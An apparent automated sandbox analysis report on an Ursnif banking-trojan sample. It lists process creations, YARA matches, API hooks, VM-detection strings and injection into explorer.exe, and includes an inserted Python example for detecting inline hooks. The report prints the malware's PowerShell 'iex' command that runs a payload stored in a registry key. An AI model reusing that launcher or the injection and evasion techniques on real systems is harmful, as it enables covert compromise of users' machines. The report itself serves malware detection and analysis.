Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000016.00000002.337592286.0000021CA1E30000.00000002.00000001.sdmp, csc.exe, 00000019.00000002.351200825.0000025155AB0000.00000002.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000001D.00000000.383918112.0000000007190000.00000002.00000001.sdmp
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.349184044.00000000043A0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.349184044.00000000043A0000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb source: control.exe, 0000001A.00000002.407242943.0000020E4C1DC000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL source: control.exe, 0000001A.00000002.407242943.0000020E4C1DC000.00000004.00000040.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 0000001D.00000000.383918112.0000000007190000.00000002.00000001.sdmp

Data Obfuscation:

Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Compiles C# or VB.Net code
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3he3buld\3he3buld.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3he3buld\3he3buld.cmdline'
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0281DB26 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey, 0_2_0281DB26
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_73CA2240 push ecx; ret 0_2_73CA2249
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_73CA2293 push ecx; ret 0_2_73CA22A3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02836BB0 push ecx; ret 0_2_02836BB9
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02836F17 push ecx; ret 0_2_02836F27
Source: C:\Windows\System32\control.exe Code function: 26_2_001D4DCD push 3B000001h; retf 26_2_001D4DD2
Source: C:\Windows\explorer.exe Code function: 29_2_03B54DCD push 3B000001h; retf 29_2_03B54DD2

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\3he3buld\3he3buld.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.dll

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.271745722.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.271874843.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.354083922.0000020E4A350000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.271783751.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.406330368.000000000020E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.282144945.000000000363B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.358522767.0000022F9D7D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.370796430.0000000002810000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.502898897.000001E7666AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.340776035.0000000002850000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.510030791.000002413CA4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.271900204.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.271888074.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.511740839.000001657A17E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.511989031.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.508337116.00000209AC23E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.399209718.000001EEFF69E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000000.369710445.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.271814846.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.271908704.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.271854980.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.368074144.0000000002AC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 4396, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6996, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7164, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4288, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFA9B335200
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFA9B33521C
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
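An inline-hook finding like the one above comes from comparing the first bytes of an exported function in the live process against the same bytes in the module image on disk, then decoding whatever the hook wrote there. The Python below is an added example, not code from the report or from the sandbox: the on-disk prologue, the two hooked variants and the virtual address are all constructed, x64 is assumed because the report's addresses are 64-bit (on x86 the `FF 25` form is an absolute `jmp [addr32]`, not RIP-relative), and the example makes no attempt to decode the exact byte sequence the report lists.

```python
"""Inline-hook check: diff a function's live prologue against its on-disk
bytes and classify the detour. Added example, not part of the report; the
bytes and the virtual address are constructed, and x64 is assumed.
"""
import struct


def classify_stub(code: bytes, va: int) -> str:
    """Describe the control transfer at the start of `code`, which lives at
    virtual address `va`, using the stub shapes user-mode hooking libraries
    commonly emit. Unknown patches are still reported, just not decoded."""
    if code[:1] == b"\xE9" and len(code) >= 5:                          # jmp rel32
        rel = struct.unpack_from("<i", code, 1)[0]
        return f"jmp rel32 -> {va + 5 + rel:#x}"
    if code[:2] == b"\xFF\x25" and len(code) >= 6:                      # jmp [rip+disp32] (x64)
        disp = struct.unpack_from("<i", code, 2)[0]
        return f"jmp [rip{disp:+#x}] via pointer at {va + 6 + disp:#x}"
    if code[:2] == b"\x48\xB8" and len(code) >= 12 and code[10:12] == b"\xFF\xE0":
        return f"mov rax, {struct.unpack_from('<Q', code, 2)[0]:#x}; jmp rax"
    if code[:1] == b"\x68" and len(code) >= 6 and code[5:6] == b"\xC3":  # push imm32; ret
        return f"push {struct.unpack_from('<I', code, 1)[0]:#x}; ret"
    if code[:1] == b"\xEB" and len(code) >= 2:                          # jmp rel8
        rel = struct.unpack_from("<b", code, 1)[0]
        return f"jmp short -> {va + 2 + rel:#x}"
    if code[:1] == b"\xCC":
        return "int3"
    return "unrecognised patch"


def compare_prologue(va: int, disk: bytes, memory: bytes, n: int = 16) -> dict:
    """Verdict for one export: unchanged, or hooked with the first patched
    bytes (same shape as the report's 'new code' field) and the decoded stub."""
    disk, memory = disk[:n], memory[:n]
    if disk == memory:
        return {"hooked": False}
    first = next((i for i, (a, b) in enumerate(zip(disk, memory)) if a != b),
                 min(len(disk), len(memory)))
    return {
        "hooked": True,
        "first_diff": first,
        "new_code": " ".join(f"0x{b:02X}" for b in memory[:6]),
        "stub": classify_stub(memory[first:], va + first),
    }


# Constructed 16-byte x64 prologue standing in for the on-disk function body,
# and a made-up load address; neither is taken from the report's dumps.
DISK = bytes.fromhex("4c8bdc49895b0849897310574883ec50")
VA = 0x7FFA9B335200

# Two constructed hooked copies of the same function: a RIP-relative
# indirect jump through a pointer slot, and a direct rel32 jump.
MEM_RIPJMP = bytes.fromhex("ff2550000000") + DISK[6:]
MEM_RELJMP = b"\xE9" + struct.pack("<i", 0x1000) + DISK[5:]


if __name__ == "__main__":
    for label, mem in (("clean", DISK), ("rip-jmp", MEM_RIPJMP), ("rel-jmp", MEM_RELJMP)):
        print(label, compare_prologue(VA, DISK, mem))
```

Reading the disk copy means parsing the PE, applying relocations and resolving the export RVA yourself; comparing against a second clean process is the cheaper approximation, but it fails when the hook is applied system-wide, as Ursnif does from explorer.exe.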
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\explorer.exe Registry key monitored for changes: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains capabilities to detect virtual machines
Source: C:\Windows\System32\control.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (3 identical events)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3698
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1665
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3he3buld\3he3buld.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.dll
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\loaddll32.exe TID: 1928 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5900 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6292 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6280 Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02828A61 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 0_2_02828A61
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02826E86 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 0_2_02826E86
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02813DEE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 0_2_02813DEE
Source: C:\Windows\explorer.exe Code function: 29_2_03B791A0 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose, 29_2_03B791A0
Source: C:\Windows\explorer.exe Code function: 29_2_03B537B8 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose, 29_2_03B537B8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02831C05 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 0_2_02831C05
Source: explorer.exe, 0000001D.00000000.389327777.0000000008C64000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWta@
Source: explorer.exe, 0000001D.00000002.510389270.0000000003710000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001D.00000000.387740964.0000000008270000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: RuntimeBroker.exe, 00000022.00000000.381725023.00000209AA054000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Ro
Source: RuntimeBroker.exe, 0000001E.00000002.502607877.000002413A440000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001D.00000000.392680390.000000000DC40000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000001D.00000000.364327459.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 0000001D.00000000.388411193.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 0000001D.00000002.518168118.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 0000001D.00000000.387740964.0000000008270000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 0000001D.00000000.387740964.0000000008270000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 0000001D.00000000.388411193.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: explorer.exe, 0000001D.00000000.387740964.0000000008270000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\System32\loaddll32.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0281DB26 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey, 0_2_0281DB26
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0282DA66 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 0_2_0282DA66

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes
Source: C:\Windows\System32\loaddll32.exe Memory allocated: C:\Windows\System32\control.exe base: 290000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory allocated: C:\Windows\explorer.exe base: 3090000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2413CAD0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1E766730000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 209AB9B0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 165793D0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1EEFEFF0000 protect: page execute and read and write
Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\3he3buld\3he3buld.0.cs
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 9B851580
Source: C:\Windows\System32\control.exe Thread created: C:\Windows\explorer.exe EIP: 9B851580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 9B851580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 9B851580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 9B851580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 9B851580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 9B851580
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: E9E000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: 7FFA9B851580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: 2AB0000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: 7FFA9B851580 value: 40
Source: C:\Windows\System32\control.exe Memory written: PID: 3472 base: E9C000 value: 00
Source: C:\Windows\System32\control.exe Memory written: PID: 3472 base: 7FFA9B851580 value: EB
Source: C:\Windows\System32\control.exe Memory written: PID: 3472 base: 3090000 value: 80
Source: C:\Windows\System32\control.exe Memory written: PID: 3472 base: 7FFA9B851580 value: 40
Maps a DLL or memory area into another process
Source: C:\Windows\System32\loaddll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
